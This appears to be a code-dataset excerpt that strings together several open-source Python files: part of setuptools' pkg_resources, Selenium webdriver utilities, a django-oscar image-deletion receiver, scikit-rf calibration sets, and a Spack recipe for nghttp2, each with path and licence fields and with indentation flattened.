register_namespace_handler(importlib_machinery.FileFinder, file_ns_handler)
def null_ns_handler(importer, path_item, packageName, module):
return None
register_namespace_handler(object, null_ns_handler)
def normalize_path(filename):
"""Normalize a file/dir name for comparison purposes"""
return os.path.normcase(os.path.realpath(filename))
def _normalize_cached(filename, _cache={}):
try:
return _cache[filename]
except KeyError:
_cache[filename] = result = normalize_path(filename)
return result
def _set_parent_ns(packageName):
parts = packageName.split('.')
name = parts.pop()
if parts:
parent = '.'.join(parts)
setattr(sys.modules[parent], name, sys.modules[packageName])
def yield_lines(strs):
"""Yield non-empty/non-comment lines of a string or sequence"""
if isinstance(strs, string_types):
for s in strs.splitlines():
s = s.strip()
# skip blank lines/comments
if s and not s.startswith('#'):
yield s
else:
for ss in strs:
for s in yield_lines(ss):
yield s
# whitespace and comment
LINE_END = re.compile(r"\s*(#.*)?$").match
# line continuation
CONTINUE = re.compile(r"\s*\\\s*(#.*)?$").match
# Distribution or extra
DISTRO = re.compile(r"\s*((\w|[-.])+)").match
# ver. info
VERSION = re.compile(r"\s*(<=?|>=?|===?|!=|~=)\s*((\w|[-.*_!+])+)").match
# comma between items
COMMA = re.compile(r"\s*,").match
OBRACKET = re.compile(r"\s*\[").match
CBRACKET = re.compile(r"\s*\]").match
MODULE = re.compile(r"\w+(\.\w+)*$").match
EGG_NAME = re.compile(
r"""
(?P<name>[^-]+) (
-(?P<ver>[^-]+) (
-py(?P<pyver>[^-]+) (
-(?P<plat>.+)
)?
)?
)?
""",
re.VERBOSE | re.IGNORECASE,
).match
class EntryPoint(object):
"""Object representing an advertised importable object"""
def __init__(self, name, module_name, attrs=(), extras=(), dist=None):
if not MODULE(module_name):
raise ValueError("Invalid module name", module_name)
self.name = name
self.module_name = module_name
self.attrs = tuple(attrs)
self.extras = Requirement.parse(("x[%s]" % ','.join(extras))).extras
self.dist = dist
def __str__(self):
s = "%s = %s" % (self.name, self.module_name)
if self.attrs:
s += ':' + '.'.join(self.attrs)
if self.extras:
s += ' [%s]' % ','.join(self.extras)
return s
def __repr__(self):
return "EntryPoint.parse(%r)" % str(self)
def load(self, require=True, *args, **kwargs):
"""
Require packages for this EntryPoint, then resolve it.
"""
if not require or args or kwargs:
warnings.warn(
"Parameters to load are deprecated. Call .resolve and "
".require separately.",
DeprecationWarning,
stacklevel=2,
)
if require:
self.require(*args, **kwargs)
return self.resolve()
def resolve(self):
"""
Resolve the entry point from its module and attrs.
"""
module = __import__(self.module_name, fromlist=['__name__'], level=0)
try:
return functools.reduce(getattr, self.attrs, module)
except AttributeError as exc:
raise ImportError(str(exc))
def require(self, env=None, installer=None):
if self.extras and not self.dist:
raise UnknownExtra("Can't require() without a distribution", self)
reqs = self.dist.requires(self.extras)
items = working_set.resolve(reqs, env, installer)
list(map(working_set.add, items))
pattern = re.compile(
r'\s*'
r'(?P<name>.+?)\s*'
r'=\s*'
r'(?P<module>[\w.]+)\s*'
r'(:\s*(?P<attr>[\w.]+))?\s*'
r'(?P<extras>\[.*\])?\s*$'
)
@classmethod
def parse(cls, src, dist=None):
"""Parse a single entry point from string `src`
Entry point syntax follows the form::
name = some.module:some.attr [extra1, extra2]
The entry name and module name are required, but the ``:attrs`` and
``[extras]`` parts are optional
"""
m = cls.pattern.match(src)
if not m:
msg = "EntryPoint must be in 'name=module:attrs [extras]' format"
raise ValueError(msg, src)
res = m.groupdict()
extras = cls._parse_extras(res['extras'])
attrs = res['attr'].split('.') if res['attr'] else ()
return cls(res['name'], res['module'], attrs, extras, dist)
@classmethod
def _parse_extras(cls, extras_spec):
if not extras_spec:
return ()
req = Requirement.parse('x' + extras_spec)
if req.specs:
raise ValueError()
return req.extras
@classmethod
def parse_group(cls, group, lines, dist=None):
"""Parse an entry point group"""
if not MODULE(group):
raise ValueError("Invalid group name", group)
this = {}
for line in yield_lines(lines):
ep = cls.parse(line, dist)
if ep.name in this:
raise ValueError("Duplicate entry point", group, ep.name)
this[ep.name]=ep
return this
@classmethod
def parse_map(cls, data, dist=None):
"""Parse a map of entry point groups"""
if isinstance(data, dict):
data = data.items()
else:
data = split_sections(data)
maps = {}
for group, lines in data:
if group is None:
if not lines:
continue
raise ValueError("Entry points must be listed in groups")
group = group.strip()
if group in maps:
raise ValueError("Duplicate group name", group)
maps[group] = cls.parse_group(group, lines, dist)
return maps
def _remove_md5_fragment(location):
if not location:
return ''
parsed = urlparse(location)
if parsed[-1].startswith('md5='):
return urlunparse(parsed[:-1] + ('',))
return location
class Distribution(object):
"""Wrap an actual or potential sys.path entry w/metadata"""
PKG_INFO = 'PKG-INFO'
def __init__(self, location=None, metadata=None, project_name=None,
version=None, py_version=PY_MAJOR, platform=None,
precedence=EGG_DIST):
self.project_name = safe_name(project_name or 'Unknown')
if version is not None:
self._version = safe_version(version)
self.py_version = py_version
self.platform = platform
self.location = location
self.precedence = precedence
self._provider = metadata or empty_provider
@classmethod
def from_location(cls, location, basename, metadata=None,**kw):
project_name, version, py_version, platform = [None]*4
basename, ext = os.path.splitext(basename)
if ext.lower() in _distributionImpl:
# .dist-info gets much metadata differently
match = EGG_NAME(basename)
if match:
project_name, version, py_version, platform = match.group(
'name','ver','pyver','plat'
)
cls = _distributionImpl[ext.lower()]
return cls(
location, metadata, project_name=project_name, version=version,
py_version=py_version, platform=platform, **kw
)
@property
def hashcmp(self):
return (
self.parsed_version,
self.precedence,
self.key,
_remove_md5_fragment(self.location),
self.py_version or '',
self.platform or '',
)
def __hash__(self):
return hash(self.hashcmp)
def __lt__(self, other):
return self.hashcmp < other.hashcmp
def __le__(self, other):
return self.hashcmp <= other.hashcmp
def __gt__(self, other):
return self.hashcmp > other.hashcmp
def __ge__(self, other):
return self.hashcmp >= other.hashcmp
def __eq__(self, other):
if not isinstance(other, self.__class__):
# It's not a Distribution, so they are not equal
return False
return self.hashcmp == other.hashcmp
def __ne__(self, other):
return not self == other
# These properties have to be lazy so that we don't have to load any
# metadata until/unless it's actually needed. (i.e., some distributions
# may not know their name or version without loading PKG-INFO)
@property
def key(self):
try:
return self._key
except AttributeError:
self._key = key = self.project_name.lower()
return key
@property
def parsed_version(self):
if not hasattr(self, "_parsed_version"):
self._parsed_version = parse_version(self.version)
return self._parsed_version
def _warn_legacy_version(self):
LV = packaging.version.LegacyVersion
is_legacy = isinstance(self._parsed_version, LV)
if not is_legacy:
return
# While an empty version is technically a legacy version and
# is not a valid PEP 440 version, it's also unlikely to
# actually come from someone and instead it is more likely that
# it comes from setuptools attempting to parse a filename and
# including it in the list. So for that we'll gate this warning
# on if the version is anything at all or not.
if not self.version:
return
tmpl = textwrap.dedent("""
'{project_name} ({version})' is being parsed as a legacy,
non PEP 440,
version. You may find odd behavior and sort order.
In particular it will be sorted as less than 0.0. It
is recommended to migrate to PEP 440 compatible
versions.
""").strip().replace('\n', ' ')
warnings.warn(tmpl.format(**vars(self)), PEP440Warning)
@property
def version(self):
try:
return self._version
except AttributeError:
for line in self._get_metadata(self.PKG_INFO):
if line.lower().startswith('version:'):
self._version = safe_version(line.split(':',1)[1].strip())
return self._version
else:
tmpl = "Missing 'Version:' header and/or %s file"
raise ValueError(tmpl % self.PKG_INFO, self)
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
dm = self.__dep_map = {None: []}
for name in 'requires.txt', 'depends.txt':
for extra, reqs in split_sections(self._get_metadata(name)):
if extra:
if ':' in extra:
extra, marker = extra.split(':', 1)
if invalid_marker(marker):
# XXX warn
reqs=[]
elif not evaluate_marker(marker):
reqs=[]
extra = safe_extra(extra) or None
dm.setdefault(extra,[]).extend(parse_requirements(reqs))
return dm
def requires(self, extras=()):
"""List of Requirements needed for this distro if `extras` are used"""
dm = self._dep_map
deps = []
deps.extend(dm.get(None, ()))
for ext in extras:
try:
deps.extend(dm[safe_extra(ext)])
except KeyError:
raise UnknownExtra(
"%s has no such extra feature %r" % (self, ext)
)
return deps
def _get_metadata(self, name):
if self.has_metadata(name):
for line in self.get_metadata_lines(name):
yield line
def activate(self, path=None):
"""Ensure distribution is importable on `path` (default=sys.path)"""
if path is None:
path = sys.path
self.insert_on(path)
if path is sys.path:
fixup_namespace_packages(self.location)
for pkg in self._get_metadata('namespace_packages.txt'):
if pkg in sys.modules:
declare_namespace(pkg)
def egg_name(self):
"""Return what this distribution's standard .egg filename should be"""
filename = "%s-%s-py%s" % (
to_filename(self.project_name), to_filename(self.version),
self.py_version or PY_MAJOR
)
if self.platform:
filename += '-' + self.platform
return filename
def __repr__(self):
if self.location:
return "%s (%s)" % (self, self.location)
else:
return str(self)
def __str__(self):
try:
version = getattr(self, 'version', None)
except ValueError:
version = None
version = version or "[unknown version]"
return "%s %s" % (self.project_name, version)
def __getattr__(self, attr):
"""Delegate all unrecognized public attributes to .metadata provider"""
if attr.startswith('_'):
raise AttributeError(attr)
return getattr(self._provider, attr)
@classmethod
def from_filename(cls, filename, metadata=None, **kw):
return cls.from_location(
_normalize_cached(filename), os.path.basename(filename), metadata,
**kw
)
def as_requirement(self):
"""Return a ``Requirement`` that matches this distribution exactly"""
if isinstance(self.parsed_version, packaging.version.Version):
spec = "%s==%s" % (self.project_name, self.parsed_version)
else:
spec = "%s===%s" % (self.project_name, self.parsed_version)
return Requirement.parse(spec)
def load_entry_point(self, group, name):
"""Return the `name` entry point of `group` or raise ImportError"""
ep = self.get_entry_info(group, name)
if ep is None:
raise ImportError("Entry point %r not found" % ((group, name),))
return ep.load()
def get_entry_map(self, group=None):
"""Return the entry point map for `group`, or the full entry map"""
try:
ep_map = self._ep_map
except AttributeError:
ep_map = self._ep_map = EntryPoint.parse_map(
self._get_metadata('entry_points.txt'), self
)
if group is not None:
return ep_map.get(group,{})
return ep_map
def get_entry_info(self, group, name):
"""Return the EntryPoint object for `group`+`name`, or ``None``"""
return self.get_entry_map(group).get(name)
def insert_on(self, path, loc = None):
"""Insert self.location in path before its nearest parent directory"""
loc = loc or self.location
if not loc:
return
nloc = _normalize_cached(loc)
bdir = os.path.dirname(nloc)
npath= [(p and _normalize_cached(p) or p) for p in path]
for p, item in enumerate(npath):
if item == nloc:
break
elif item == bdir and self.precedence == EGG_DIST:
# if it's an .egg, give it precedence over its directory
if path is sys.path:
self.check_version_conflict()
path.insert(p, loc)
npath.insert(p, nloc)
break
else:
if path is sys.path:
self.check_version_conflict()
path.append(loc)
return
# p is the spot where we found or inserted loc; now remove duplicates
while True:
try:
np = npath.index(nloc, p+1)
except ValueError:
break
else:
del npath[np], path[np]
# ha!
p = np
return
def check_version_conflict(self):
if self.key == 'setuptools':
# ignore the inevitable setuptools self-conflicts :(
return
nsp = dict.fromkeys(self._get_metadata('namespace_packages.txt'))
loc = normalize_path(self.location)
for modname in self._get_metadata('top_level.txt'):
if (modname not in sys.modules or modname in nsp
or modname in _namespace_packages):
continue
if modname in ('pkg_resources', 'setuptools', 'site'):
continue
fn = getattr(sys.modules[modname], '__file__', None)
if fn and (normalize_path(fn).startswith(loc) or
fn.startswith(self.location)):
continue
issue_warning(
"Module %s was already imported from %s, but %s is being added"
" to sys.path" % (modname, fn, self.location),
)
def has_version(self):
try:
self.version
except ValueError:
issue_warning("Unbuilt egg for " + repr(self))
return False
return True
def clone(self,**kw):
"""Copy this distribution, substituting in any changed keyword args"""
names = 'project_name version py_version platform location precedence'
for attr in names.split():
kw.setdefault(attr, getattr(self, attr, None))
kw.setdefault('metadata', self._provider)
return self.__class__(**kw)
@property
def extras(self):
return [dep for dep in self._dep_map if dep]
class DistInfoDistribution(Distribution):
"""Wrap an actual or potential sys.path entry w/metadata, .dist-info style"""
PKG_INFO = 'METADATA'
EQEQ = re.compile(r"([\(,])\s*(\d.*?)\s*([,\)])")
@property
def _parsed_pkg_info(self):
"""Parse and cache metadata"""
try:
return self._pkg_info
except AttributeError:
metadata = self.get_metadata(self.PKG_INFO)
self._pkg_info = email.parser.Parser().parsestr(metadata)
return self._pkg_info
@property
def _dep_map(self):
try:
return self.__dep_map
except AttributeError:
self.__dep_map = self._compute_dependencies()
return self.__dep_map
def _preparse_requirement(self, requires_dist):
"""Convert 'Foobar (1); baz' to ('Foobar ==1', 'baz')
Split environment marker, add == prefix to version specifiers as
necessary, and remove parenthesis.
"""
parts = requires_dist.split(';', 1) + ['']
distvers = parts[0].strip()
mark = parts[1].strip()
distvers = re.sub(self.EQEQ, r"\1==\2\3", distvers)
distvers = distvers.replace('(', '').replace(')', '')
return (distvers, mark)
def _compute_dependencies(self):
"""Recompute this distribution's dependencies."""
from pip._vendor._markerlib import compile as compile_marker
dm = self.__dep_map = {None: []}
reqs = []
# Including any condition expressions
for req in self._parsed_pkg_info.get_all('Requires-Dist') or []:
distvers, mark = self._preparse_requirement(req)
parsed = next(parse_requirements(distvers))
parsed.marker_fn = compile_marker(mark)
reqs.append(parsed)
def reqs_for_extra(extra):
for req in reqs:
if req.marker_fn(override={'extra':extra}):
yield req
common = frozenset(reqs_for_extra(None))
dm[None].extend(common)
for extra in self._parsed_pkg_info.get_all('Provides-Extra') or []:
extra = safe_extra(extra.strip())
dm[extra] = list(frozenset(reqs_for_extra(extra)) - common)
return dm
_distributionImpl = {
'.egg': Distribution,
'.egg-info': Distribution,
'.dist-info': DistInfoDistribution,
}
def issue_warning(*args,**kw):
level = 1
g = globals()
try:
# find the first stack frame that is *not* code in
# the pkg_resources module, to use for the warning
while sys._getframe(level).f_globals is g:
level += 1
except ValueError:
pass
warnings.warn(stacklevel=level + 1, *args, **kw)
class RequirementParseError(ValueError):
def __str__(self):
return ' '.join(self.args)
def parse_requirements(strs):
"""Yield ``Requirement`` objects for each specification in `strs`
`strs` must be a string, or a (possibly-nested) iterable thereof.
"""
# create a steppable iterator, so we can handle \-continuations
lines = iter(yield_lines(strs))
def scan_list(ITEM, TERMINATOR, line, p, groups, item_name):
items = []
while not TERMINATOR(line, p):
if CONTINUE(line, p):
try:
line = next(lines)
p = 0
except StopIteration:
msg = "\\ must not appear on the last nonblank line"
raise RequirementParseError(msg)
match = ITEM(line, p)
if not match:
msg = "Expected " + item_name + " in"
raise RequirementParseError(msg, line, "at", line[p:])
items.append(match.group(*groups))
p = match.end()
match = COMMA(line, p)
if match:
# skip the comma
p = match.end()
elif not TERMINATOR(line, p):
msg = "Expected ',' or end-of-list in"
raise RequirementParseError(msg, line, "at", line[p:])
match = TERMINATOR(line, p)
# skip the terminator, if any
if match:
p = match.end()
return line, p, items
for line in lines:
match = DISTRO(line)
if not match:
raise RequirementParseError("Missing distribution spec", line)
project_name = match.group(1)
p = match.end()
extras = []
match = OBRACKET(line, p)
if match:
p = match.end()
line, p, extras = scan_list(
DISTRO, CBRACKET, line, p, (1,), "'extra' name"
)
line, p, specs = scan_list(VERSION, LINE_END, line, p, (1, 2),
"version spec")
specs = [(op, val) for op, val in specs]
yield Requirement(project_name, specs, extras)
class Requirement:
def __init__(self, project_name, specs, extras):
"""DO NOT CALL THIS UNDOCUMENTED METHOD; use Requirement.parse()!"""
self.unsafe_name, project_name = project_name, safe_name(project_name)
self.project_name, self.key = project_name, project_name.lower()
self.specifier = packaging.specifiers.SpecifierSet(
",".join(["".join([x, y]) for x, y in specs])
)
self.specs = specs
self.extras = tuple(map(safe_extra, extras))
self.hashCmp = (
self.key,
self.specifier,
frozenset(self.extras),
)
self.__hash = hash(self.hashCmp)
def __str__(self):
extras = ','.join(self.extras)
if extras:
extras = '[%s]' % extras
return '%s%s%s' % (self.project_name, extras, self.specifier)
def __eq__(self, other):
return (
isinstance(other, Requirement) and
self.hashCmp == other.hashCmp
)
def __ne__(self, other):
return not self == other
def __contains__(self, item):
if isinstance(item, Distribution):
if item.key != self.key:
return False
item = item.version
# Allow prereleases always in order to match the previous behavior of
# this method. In the future this should be smarter and follow PEP 440
# more accurately.
return self.specifier.contains(item, prereleases=True)
def __hash__(self):
return self.__hash
def __repr__(self): return "Requirement.parse(%r)" % str(self)
@staticmethod
def parse(s):
reqs = list(parse_requirements(s))
if reqs:
if len(reqs) == 1:
return reqs[0]
raise ValueError("Expected only one requirement", s)
raise ValueError("No requirements found", s)
def _get_mro(cls):
"""Get an mro for a type or classic class"""
if not isinstance(cls, type):
class cls(cls, object): pass
return cls.__mro__[1:]
return cls.__mro__
def _find_adapter(registry, ob):
"""Return an adapter factory for `ob` from `registry`"""
for t in _get_mro(getattr(ob, '__class__', type(ob))):
if t in registry:
return registry[t]
def ensure_directory(path):
"""Ensure that the parent directory of `path` exists"""
dirname = os.path.dirname(path)
if not os.path.isdir(dirname):
os.makedirs(dirname)
def _bypass_ensure_directory(path):
"""Sandbox-bypassing version of ensure_directory()"""
if not WRITE_SUPPORT:
raise IOError('"os.mkdir" not supported on this platform.')
dirname, filename = split(path)
if dirname and filename and not isdir(dirname):
_bypass_ensure_directory(dirname)
mkdir(dirname, 0o755)
def split_sections(s):
"""Split a string or iterable thereof into (section, content) pairs
Each ``section`` is a stripped version of the section header ("[section]")
and each ``content`` is a list of stripped lines excluding blank lines and
comment-only lines. If there are any such lines before the first section
header, they're returned in a first ``section`` of ``None``.
"""
section = None
content = []
for line in yield_lines(s):
if line.startswith("["):
if line.endswith("]"):
if section or content:
yield section, content
section = line[1:-1].strip()
content = []
else:
raise ValueError("Invalid section heading", line)
else:
content.append(line)
# wrap up last segment
yield section, content
def _mkstemp(*args,**kw):
old_open = os.open
try:
# temporarily bypass sandboxing
os.open = os_open
return tempfile.mkstemp(*args,**kw)
finally:
# and then put it back
os.open = old_open
# Silence the PEP440Warning by default, so that end users don't get hit by it
# randomly just because they use pkg_resources. We want to append the rule
# because we want earlier uses of filterwarnings to take precedence over this
# one.
warnings.filterwarnings("ignore", category=PEP440Warning, append=True)
# from jaraco.functools 1.3
def _call_aside(f, *args, **kwargs):
f(*args, **kwargs)
return f
@_call_aside
def _initialize(g=globals()):
"Set up global resource manager (deliberately not state-saved)"
manager = ResourceManager()
g['_manager'] = manager
for name in dir(manager):
if not name.startswith('_'):
g[name] = getattr(manager, name)
@_call_aside
def _initialize_master_working_set():
"""
Prepare the master working set and make the ``require()``
API available.
This function has explicit effects on the global state
of pkg_resources. It is intended to be invoked once at
the initialization of this module.
Invocation by other packages is unsupported and done
at their own risk.
"""
working_set = WorkingSet._build_master()
_declare_state('object', working_set=working_set)
require = working_set.require
iter_entry_points = working_set.iter_entry_points
add_activation_listener = working_set.subscribe
run_script = working_set.run_script
# backward compatibility
run_main = run_script
# Activate all distributions already on sys.path, and ensure that
# all distributions added to the working set in the future (e.g. by
# calling ``require()``) will get activated as well.
add_activation_listener(lambda dist: dist.activate())
working_set.entries=[]
# match order
list(map(working_set.add_entry, sys.path))
globals().update(locals())
| mit |
dorotan/pythontraining | env/Lib/site-packages/selenium/webdriver/common/utils.py | 3 | 4191 | # Licensed to the Software Freedom Conservancy (SFC) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The SFC licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
"""
The Utils methods.
"""
import socket
from selenium.webdriver.common.keys import Keys
try:
basestring
except NameError:
# Python 3
basestring = str
def free_port():
"""
Determines a free port using sockets.
"""
free_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
free_socket.bind(('0.0.0.0', 0))
free_socket.listen(5)
port = free_socket.getsockname()[1]
free_socket.close()
return port
def find_connectable_ip(host, port=None):
"""Resolve a hostname to an IP, preferring IPv4 addresses.
We prefer IPv4 so that we don't change behavior from previous IPv4-only
implementations, and because some drivers (e.g., FirefoxDriver) do not
support IPv6 connections.
If the optional port number is provided, only IPs that listen on the given
port are considered.
:Args:
- host - A hostname.
- port - Optional port number.
:Returns:
A single IP address, as a string. If any IPv4 address is found, one is
returned. Otherwise, if any IPv6 address is found, one is returned. If
neither, then None is returned.
"""
try:
addrinfos = socket.getaddrinfo(host, None)
except socket.gaierror:
return None
ip = None
for family, _, _, _, sockaddr in addrinfos:
connectable = True
if port:
connectable = is_connectable(port, sockaddr[0])
if connectable and family == socket.AF_INET:
return sockaddr[0]
if connectable and not ip and family == socket.AF_INET6:
ip = sockaddr[0]
return ip
def join_host_port(host, port):
"""Joins a hostname and port together.
This is a minimal implementation intended to cope with IPv6 literals. For
example, _join_host_port('::1', 80) == '[::1]:80'.
:Args:
- host - A hostname.
- port - An integer port.
"""
if ':' in host and not host.startswith('['):
return '[%s]:%d' % (host, port)
return '%s:%d' % (host, port)
def is_connectable(port, host="localhost"):
"""
Tries to connect to the server at port to see if it is running.
:Args:
- port: The port to connect.
"""
socket_ = None
try:
socket_ = socket.create_connection((host, port), 1)
result = True
except socket.error:
result = False
finally:
if socket_:
socket_.close()
return result
def is_url_connectable(port):
"""
Tries to connect to the HTTP server at /status path
and specified port to see if it responds successfully.
:Args:
- port: The port to connect.
"""
try:
from urllib import request as url_request
except ImportError:
import urllib2 as url_request
try:
res = url_request.urlopen("http://127.0.0.1:%s/status" % port)
if res.getcode() == 200:
return True
else:
return False
except:
return False
def keys_to_typing(value):
"""Processes the values that will be typed in the element."""
typing = []
for val in value:
if isinstance(val, Keys):
typing.append(val)
elif isinstance(val, int):
val = str(val)
for i in range(len(val)):
typing.append(val[i])
else:
for i in range(len(val)):
typing.append(val[i])
return typing
| apache-2.0 |
kapari/django-oscar | src/oscar/apps/catalogue/receivers.py | 60 | 1249 | # -*- coding: utf-8 -*-
from django.conf import settings
if settings.OSCAR_DELETE_IMAGE_FILES:
from oscar.core.loading import get_model
from django.db import models
from django.db.models.signals import post_delete
from sorl import thumbnail
from sorl.thumbnail.helpers import ThumbnailError
ProductImage = get_model('catalogue', 'ProductImage')
Category = get_model('catalogue', 'Category')
def delete_image_files(sender, instance, **kwargs):
"""
Deletes the original image, created thumbnails, and any entries
in sorl's key-value store.
"""
image_fields = (models.ImageField, thumbnail.ImageField)
for field in instance._meta.fields:
if isinstance(field, image_fields):
# Make Django return ImageFieldFile instead of ImageField
fieldfile = getattr(instance, field.name)
try:
thumbnail.delete(fieldfile)
except ThumbnailError:
pass
# connect for all models with ImageFields - add as needed
models_with_images = [ProductImage, Category]
for sender in models_with_images:
post_delete.connect(delete_image_files, sender=sender)
| bsd-3-clause |
willhaines/scikit-rf | skrf/calibration/calibrationSet.py | 10 | 4426 |
'''
.. module:: skrf.calibration.calibrationSet
================================================================
calibrationSet (:mod:`skrf.calibration.calibrationSet`)
================================================================
Contains the CalibrationSet class, and supporting functions
CalibrationSet Class
===============
.. autosummary::
:toctree: generated/
CalibrationSet
'''
from itertools import product, combinations, permutations
from .calibration import Calibration
from ..networkSet import NetworkSet
def cartesian_product(ideals, measured_sets, *args, **kwargs):
'''
'''
measured_lists = product(*[k[:] for k in measured_sets])
return [Calibration(ideals = ideals, measured = measured,
*args, **kwargs) for measured in measured_lists ]
def dot_product(ideals, measured_sets, *args, **kwargs):
'''
'''
for measured_set in measured_sets:
if len(measured_set) != len(measured_sets[0]):
raise(IndexError('all measured NetworkSets must have same length for dot product combinatoric function'))
cal_list = []
for k in list(range(len(measured_sets[0]))):
measured = [measured_set[k] for measured_set in measured_sets]
cal_list.append(
Calibration(ideals=ideals, measured= measured,
*args,**kwargs)
)
return cal_list
class CalibrationSet(object):
'''
A set of Calibrations
This is designed to support experimental uncertainty analysis [1]_.
References
-----------
.. [1] A. Arsenovic, L. Chen, M. F. Bauwens, H. Li, N. S. Barker, and R. M. Weikle, "An Experimental Technique for Calibration Uncertainty Analysis," IEEE Transactions on Microwave Theory and Techniques, vol. 61, no. 1, pp. 263-269, 2013.
'''
def __init__(self, cal_class, ideals, measured_sets,*args, **kwargs):
'''
Parameters
----------
cal_class : a Calibration class
this is the class of calibration to use on the set. This
argument is the actual class itself like OnePort, TRL, SOLT, etc
ideals : list of Networks
measured_set : list of NetworkSets, or list of lists
each element in this list should be a corresponding measured
set to the ideals element of the same index. The sets
themselves can be anything list-like
\\*args\\**kargs :
passed to self.run(),
'''
self.cal_class = cal_class
self.ideals = ideals
self.measured_sets = measured_sets
self.args = args
self.kwargs = kwargs
self.run(*args, **kwargs)
def __getitem__(self, key):
return self.cal_list[key]
def apply_cal(self, raw_ntwk, *args, **kwargs):
'''
'''
return NetworkSet([k.apply_cal(raw_ntwk) for k in self.cal_list],
*args, **kwargs)
def plot_uncertainty_per_standard(self):
'''
'''
self.dankness('std_s','plot_s_mag')
def dankness(self, prop, func, *args, **kwargs):
'''
'''
try:
[k.__getattribute__(prop).__getattribute__(func)\
(*args, **kwargs) for k in self.measured_sets]
except (TypeError):
return [k.__getattribute__(prop).__getattribute__(func) \
for k in self.measured_sets]
def run(self):
NotImplementedError('SubClass must implement this')
@property
def corrected_sets(self):
'''
The set of corrected networks, each is corrected by its corresponding
element in the cal_list
'''
n_meas = len(self.cal_list[0].measured)
mat = [k.caled_ntwks for k in self.cal_list]
return [NetworkSet([k[l] for k in mat]) for l in range(n_meas)]
class Dot(CalibrationSet):
def run(self, *args, **kwargs):
ideals = self.ideals
measured_sets = self.measured_sets
if len(set(map(len, measured_sets))) !=1:
raise(IndexError('all measured NetworkSets must have same length for dot product combinatoric function'))
self.cal_list = []
for k in range(len(measured_sets[0])):
measured = [measured_set[k] for measured_set in measured_sets]
cal = self.cal_class(ideals=ideals, measured= measured,
*args,**kwargs)
self.cal_list.append(cal)
| bsd-3-clause |
matthiasdiener/spack | var/spack/repos/builtin/packages/nghttp2/package.py | 5 | 2319 | ##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Nghttp2(AutotoolsPackage):
"""nghttp2 is an implementation of HTTP/2 and its header compression
algorithm HPACK in C."""
homepage = "https://nghttp2.org/"
url = "https://github.com/nghttp2/nghttp2/releases/download/v1.26.0/nghttp2-1.26.0.tar.gz"
version('1.26.0', '83fa813b22bacbc6ea80dfb24847569f')
depends_on('[email protected]:', type=('build', 'run'))
depends_on('[email protected]:', type=('build', 'run'))
depends_on('py-setuptools', type=('build'))
def setup_environment(self, spack_env, run_env):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
spack_env.prepend_path('PYTHONPATH', site_packages_dir)
@run_before('install')
def ensure_install_dir_exists(self):
site_packages_dir = '/'.join(
[self.spec.prefix.lib,
('python' + str(self.spec['python'].version.up_to(2))),
'site-packages'])
mkdirp(site_packages_dir)
| lgpl-2.1 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.